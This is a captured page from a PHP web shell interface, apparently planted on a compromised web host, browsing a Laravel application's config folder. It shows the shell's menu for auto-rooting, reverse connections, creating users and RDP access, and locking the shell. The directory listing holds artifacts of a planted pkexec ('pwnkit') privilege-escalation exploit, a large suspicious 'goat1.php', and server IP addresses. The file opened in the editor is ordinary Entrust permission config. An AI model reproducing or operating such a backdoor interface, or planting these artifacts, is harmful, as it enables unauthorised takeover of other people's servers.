Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
iosCertificates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
api.php
1.03
KB
-rw-r--r--
app.php
10.93
KB
-rw-r--r--
auth.php
3.74
KB
-rw-r--r--
backup.php
9.11
KB
-rw-r--r--
broadcasting.php
2.21
KB
-rw-r--r--
cache.php
3.07
KB
-rw-r--r--
cashier.php
4.96
KB
-rw-r--r--
cors.php
1.09
KB
-rw-r--r--
database.php
4.99
KB
-rw-r--r--
datatables-buttons.php
2.22
KB
-rw-r--r--
datatables-html.php
719
B
-rw-r--r--
debugbar.php
8.49
KB
-rw-r--r--
dompdf.php
11.14
KB
-rw-r--r--
entrust.php
5.13
KB
-rw-r--r--
entrust_seeder.php
560
B
-rw-r--r--
error_log
15.56
KB
-rw-r--r--
excel.php
11.97
KB
-rw-r--r--
filesystems.php
4.49
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
froiden_envato.php
1.79
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
imap.php
7.79
KB
-rw-r--r--
installer.php
1.29
KB
-rw-r--r--
laravel-device-tracking.php
785
B
-rw-r--r--
laravel_google_translate.php
552
B
-rw-r--r--
location.php
3.59
KB
-rw-r--r--
log-viewer.php
7.05
KB
-rw-r--r--
logcleaner.php
907
B
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.45
KB
-rw-r--r--
modules.php
10.41
KB
-rw-r--r--
mollie.php
1.93
KB
-rw-r--r--
onesignal.php
537
B
-rw-r--r--
payfast.php
1.37
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
pushnotification.php
530
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.37
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
sentry.php
1.7
KB
-rw-r--r--
services.php
3.07
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.45
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss_ignore.php
461
B
-rw-r--r--
zoom.php
443
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : entrust.php
<?php /** * This file is part of Laravel Entrust, * Handle Role-based Permissions for Laravel. * */ return [ /* |-------------------------------------------------------------------------- | Migration Suffix |-------------------------------------------------------------------------- | | This is the array that contains the information of the user models. | This information is used in the add-trait command, and for the roles and | permissions relationships with the possible user models. | | The key in the array is the name of the relationship inside the roles and permissions. | */ 'migrationSuffix' => 'laravel_entrust_setup_tables', /* |-------------------------------------------------------------------------- | Laravel Entrust User Model |-------------------------------------------------------------------------- | | This is the users Model used by the application to handle ACL. | If you want the Laravel Entrust User Model to be in a different namespace or | to have a different name, you can do it here. | */ 'user_model' => 'App\Models\User', /* |-------------------------------------------------------------------------- | Laravel Entrust User Table |-------------------------------------------------------------------------- | | This is the users table used by the application to save users to the database. | If you want the Laravel Entrust User Table to be in a different namespace or | to have a different name, you can do it here. | */ 'user_table' => 'users', /* |-------------------------------------------------------------------------- | Laravel Entrust Models |-------------------------------------------------------------------------- | | These are the models used by Laravel Entrust to define the roles and permissions. | If you want the Laravel Entrust models to be in a different namespace or | to have a different name, you can do it here. | */ 'models' => [ 'role' => 'App\Models\Role', 'permission' => 'App\Models\Permission', ], /* |-------------------------------------------------------------------------- | Laravel Entrust Default Configurations |-------------------------------------------------------------------------- | | These Configurations are used by Laravel Entrust to define the defaults | If you want the Laravel Entrust to be in a different guards you can do it here. | */ 'defaults' => [ 'guard' => 'web', ], /* |-------------------------------------------------------------------------- | Laravel Entrust Tables |-------------------------------------------------------------------------- | | These are the tables used by Laravel Entrust to store all the authorization data. | */ 'tables' => [ 'roles' => 'roles', 'permissions' => 'permissions', 'role_user' => 'role_user', 'permission_role' => 'permission_role', ], /* |-------------------------------------------------------------------------- | Laratrust Foreign Keys |-------------------------------------------------------------------------- | | These are the foreign keys used by laratrust in the intermediate tables. | */ 'foreign_keys' => [ 'user' => 'user_id', 'role' => 'role_id', 'permission' => 'permission_id', ], /* |-------------------------------------------------------------------------- | Laravel Entrust Middleware |-------------------------------------------------------------------------- | | This configuration helps to customize the Laravel Entrust middleware behavior. | */ 'middleware' => [ /** * Define if the laratrust middleware are registered automatically in the service provider */ 'register' => true, /** * Method to be called in the middleware return case. * Available: abort|redirect */ 'handling' => 'abort', /** * Handlers for the unauthorized method in the middlewares. * The name of the handler must be the same as the handling. */ 'handlers' => [ /** * Aborts the execution with a 403 code and allows you to provide the response text */ 'abort' => [ 'code' => 403, 'message' => 'You don\'t Have a permission to Access this page.' ], /** * Redirects the user to the given url. * If you want to flash a key to the session, * you can do it by setting the key and the content of the message * If the message content is empty it won't be added to the redirection. */ 'redirect' => [ 'url' => '/', 'message' => [ 'key' => 'error', 'content' => 'You don\'t Have a permission to Access this page' ] ], ], ], ];
Close